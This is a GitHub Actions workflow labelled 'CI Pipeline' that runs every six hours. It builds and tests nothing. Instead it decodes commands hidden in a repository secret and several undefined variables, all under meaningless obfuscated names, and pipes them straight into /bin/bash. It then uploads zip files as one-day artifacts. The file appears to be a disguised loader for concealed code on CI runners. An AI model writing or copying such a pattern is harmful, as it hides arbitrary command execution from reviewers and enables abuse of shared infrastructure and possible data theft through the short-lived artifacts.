name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '0 0,6,12,18 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          xtd2018: ${{ secrets.xtd2018 }}
        run: |
          printf '%s' "$xtd2018" | jq -r .odrsg4330 | /bin/bash
          printf '%s' "$l5" | jq -r .pf07167 | /bin/bash
          echo $hbpdf342 | jq -r .ib958 | /bin/bash
          echo $xxkl704 | jq -r .mrpg25634 | /bin/bash
          printf '%s' "$mziyp4" | jq -r .utyb0 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: tFZCwMtL
          path: "*.zip"
          retention-days: 1
